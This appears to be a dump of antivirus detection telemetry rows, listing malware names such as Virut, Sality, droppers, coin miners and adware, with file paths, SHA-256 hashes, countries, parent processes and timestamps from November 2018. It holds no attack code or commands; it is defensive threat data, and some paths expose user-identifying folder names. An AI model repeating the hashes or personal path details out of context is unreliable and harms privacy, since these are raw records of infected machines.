  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Desktop\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='\\\\\\/factory,{ceff45ee-c862-41de-aee2-a022c81eda92} -Embedding', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T19:10:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='connectedpdf.bat', filepath='C:\\Users\\X\\Foxit Software\\Foxit Reader\\ConnectedPDF\\ConnectedPDF.bat', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='5d7619a3ea0a69ca84d26878d6cc2d60a93f9b95f23d937c064d5ba9043b9405', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-223710-7c60c97d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_168a4335\\AVSCAN-20181101-223606-74D00FBF\\AVSCAN-20181101-223710-7C60C97D', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T21:37:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rrinstaller.exe', filepath='C:\\Windows.old.000\\Windows\\System32\\rrinstaller.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='80408c745f7abe6a279be31381871c20f87333b0270be611fc1c0b4cfe3bbcb5', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-01T02:46:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='8544.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Name\\8544.exe', filesize=1024000, name='Adware/CsdiMonetize.vgssx.#M1.#R1'), hash='2ca558499e6b9e872f4efe36145d1a52668b8e36f4eccad678575dad8d594f64', metadata=Row(cmdline=None, country='PG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:02:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=18000000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4395a2f66bedbc17ea2e71d40b5a27dc765e4b53bc359a5bfb18d5d743bfca8a', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-01T11:44:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002457-48881e43', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-002457-48881E43', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:25:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-112627-3ab45aed', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_177b8b7e\\AVSCAN-20181101-112611-3778366B\\AVSCAN-20181101-112627-3AB45AED', filesize=3200000, name='PUA/AD.IStartSurf.Y.#M1.#R1'), hash='1bb0ffcdb763c947cfecccdb30a19ec33491ff48996e9891b25fcf81a6229d02', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T10:26:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-231937-d0de2a6a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_22556673\\AVSCAN-20181101-231924-CF5163BE\\AVSCAN-20181101-231937-D0DE2A6A', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:19:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002757-5c0bda61', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-002757-5C0BDA61', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:28:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dealplylive.exe', filepath='C:\\Program Files (x86)\\DealPlyLive\\Update\\DealPlyLive.exe', filesize=148000, name='ADWARE/DealPly.Gen4.#M300.#R300171'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Common Files\\mcafee\\AMCore\\mcshield.exe', parentsize=1017016, timestamp='2018-11-01T19:35:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='winfilter_x64.dll', filepath='C:\\AdwCleaner\\quarantine\\files\\thxiaanvkrlhlbppnutxyefjynpmrtzp\\WinFilter_x64.dll', filesize=4224000, name='TR/BProtector.Gen.#M300.#R8258'), hash='7c2847d05c2c39f34ec6e826ee8bcb7f7db54bd754d9eb5ddf62d23254142045', metadata=Row(cmdline='-k secsvcs', country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T15:54:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T05:54:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0117533.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0117533.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:37:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160434-2c072ea2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_be284484\\AVSCAN-20181101-160416-29C2C5FB\\AVSCAN-20181101-160434-2C072EA2', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:04:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dxaf1f7.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\dxaF1F6.tmp\\dxaF1F7.tmp', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T10:31:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002723-584f453d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-002723-584F453D', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:27:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='IL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-01T13:37:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-115711-5ed0e3bd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_85136ac4\\AVSCAN-20181101-115646-491901FF\\AVSCAN-20181101-115711-5ED0E3BD', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-01T01:52:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181103-010159-9e1e7ade', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_876ebb48\\AVSCAN-20181103-010040-907C6C8E\\AVSCAN-20181103-010159-9E1E7ADE', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:48:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='jet40sp5_9xnt.exe', filepath='D:\\Scan\\wulan1\\BACKUP\\BMD Street\\hysys 7.3\\aspenONEV7.3dvd1\\administration\\AFW\\afwv73\\core\\mdac27sp1\\Jet40SP5_9xNT.exe', filesize=2752000, name='W32/Virut.Gen.#M1.#R1'), hash='0c78da3d90f2b7b5976846aaa31136a601a9f378a646284a2db245abce5e346f', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe779_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe779 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T11:45:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='8544.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Name\\8544.exe', filesize=1024000, name='Adware/CsdiMonetize.vgssx.#M1.#R1'), hash='2ca558499e6b9e872f4efe36145d1a52668b8e36f4eccad678575dad8d594f64', metadata=Row(cmdline=None, country='PG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:50:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='lfs.exe', filepath='D:\\Games\\Live For Speed\\LFS.exe', filesize=2048000, name='W32/Jadtre.B.#M1.#R1'), hash='019b107be6f29e5a5bc270949eebf2de537dc52adeaa147eaa0f39f9e4caee99', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=35176, timestamp='2018-11-01T00:06:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='47199dc26abc5e0fc9dffcad059efa4b499ec7f5590656eefc69d77a26c55ad8', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-34\\47199DC26ABC5E0FC9DFFCAD059EFA4B499EC7F5590656EEFC69D77A26C55AD8', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='47199dc26abc5e0fc9dffcad059efa4b499ec7f5590656eefc69d77a26c55ad8', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:51:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ojfjfxha.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\oJfJFXHA.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service_2e9b0140.vir', filepath='\\\\?\\C:\\Applications\\Service_2e9b0140.VIR', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:21:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='marchioro maria grazia.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\ENGIM2014-2015\\engim varie\\STAGE 574309\\MARCHIORO MARIA GRAZIA.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:28:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152357-9fd9f301', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-152357-9FD9F301', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:24:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pureset.exe', filepath='C:\\Program Files\\Pure Codec\\Codecs\\PureSet.exe', filesize=384000, name='W32/Sality.AT.#M1.#R1'), hash='b84666be3d52db8bda3cb3ecce95becbb4620ccc0644a852889a04a1f54204db', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:40:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-182551-31efc07f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_836b6955\\AVSCAN-20181101-182243-1213B2D6\\AVSCAN-20181101-182551-31EFC07F', filesize=2944000, name='TR/Dropper.MSIL.Gen.#M1.#R1'), hash='c76d46252236f45d25880eb78c70ba71eae66004af87257fc1541dcf6d680206', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:25:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='purchase_order.iso', filepath='\\\\.\\C:\\Users\\X\\AppData\\Roaming\\Avira\\Antivirus\\MAIL\\TEMP\\00001a08\\ML00201.DIR\\Purchase_Order.iso', filesize=512000, name='TR/Dropper.VB.elr.#M1.#R1'), hash='b87c091078ba4c717c793ace6a45fb5e9265f1200c81c62d5d4a8299bd9b987e', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:44:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dfjukopy.exe', filepath='\\?\\J:\\العاب\\GTA12\\dfjukopy.EXE', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='9b984dc2283424ea7609dc5cb6ed5b3e245f725c952c54e3b41255a0a4c9e8b4', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:47:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='eb78f1f6360f8f9996608fd2932c2a80213d43bd4ca6cf68e0d972670ff04ff6', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-16\\EB78F1F6360F8F9996608FD2932C2A80213D43BD4CA6CF68E0D972670FF04FF6', filesize=1920000, name='TR/Crypt.ZPACK.Gen.#M300.#R3881'), hash='eb78f1f6360f8f9996608fd2932c2a80213d43bd4ca6cf68e0d972670ff04ff6', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-16.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-17.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-18.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-19.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-20.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\archive.zip\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T05:56:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-233016-fa38d145', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ee40cc1e\\AVSCAN-20181101-232719-E449CBE6\\AVSCAN-20181101-233016-FA38D145', filesize=384000, name='TR/Kazy.172396.13.#M1.#R1'), hash='8f1dec1c6b9b63b8db50306eaa71bfdb6d70757a3a6c204d4e0cf5c635cdaf72', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:29:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-151600-4469b2d8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-151600-4469B2D8', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:16:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='f24c205f24578e614174b82301bfb53e438f56a3b719d72bd0537dd306d4d9f3', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T05:03:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0330984.exe', filepath='e:\\system volume information\\_restore{64f1701b-39b4-4c9e-b329-c1179e2aa913}\\rp65\\A0330984.exe', filesize=104000, name='W32/Sality.AT.#M1.#R1'), hash='a98676084090dc54c3fd136efa81b9824d1ec443433fc5b7b63c894254039619', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:27:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsp621C.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='MN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Fotor3_3.4.1(163.15)_win32_x64_official.exe', parentsize=268416568, timestamp='2018-11-01T11:52:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gbrybumc.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\gBrYbuMC.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='servizi.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI FORMAZIONE ADULTI\\SERVIZI.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:10:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\TEMP\\ieqa3hs23l5\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:34:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-093617-a0aeb2ae', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-093617-A0AEB2AE', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:36:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-223321-7b69f398', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_17e00215\\AVSCAN-20181101-223243-745480A4\\AVSCAN-20181101-223321-7B69F398', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:33:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='hopinst.exe', filepath='C:\\Program Files (x86)\\interhpx_00000001\\HopInst.exe', filesize=192000, name='Adware/ELEX.umebz.#M1.#R1'), hash='bf33a2fa1417e9e761302b0d0f29c355a3841a18117dadb6085389763bbf5f4d', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:08:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\vck1uciijtz\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T04:28:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='$rx4m0k0', filepath='C:\\$Recycle.Bin\\S-1-5-21-1024011789-1237596223-2747892489-21661\\$RX4M0K0', filesize=64000, name='VBA/Dldr.Agent.jwpvr.#M1.#R1'), hash='932852003f0eeca3b53e7b41990143fbb88010116ff01e297bc023d6ce4a677a', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\totalcmd\\TOTALCMD64.EXE', parentsize=8694408, timestamp='2018-11-01T15:52:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181104-171403-6c0e861a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e28951c1\\AVSCAN-20181104-170735-27CB4304\\AVSCAN-20181104-171403-6C0E861A', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5cc1e61c072716b3441ffa86c7e63567559b222d6f7826a593b9793e5bd8d99c', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:14:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Downloads\\nhm_windows_1.9.0.4\\bin_3rdparty\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe4_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe4 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='AU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T12:52:46Z'), dt=datetime.date(2018, 11, 4)),
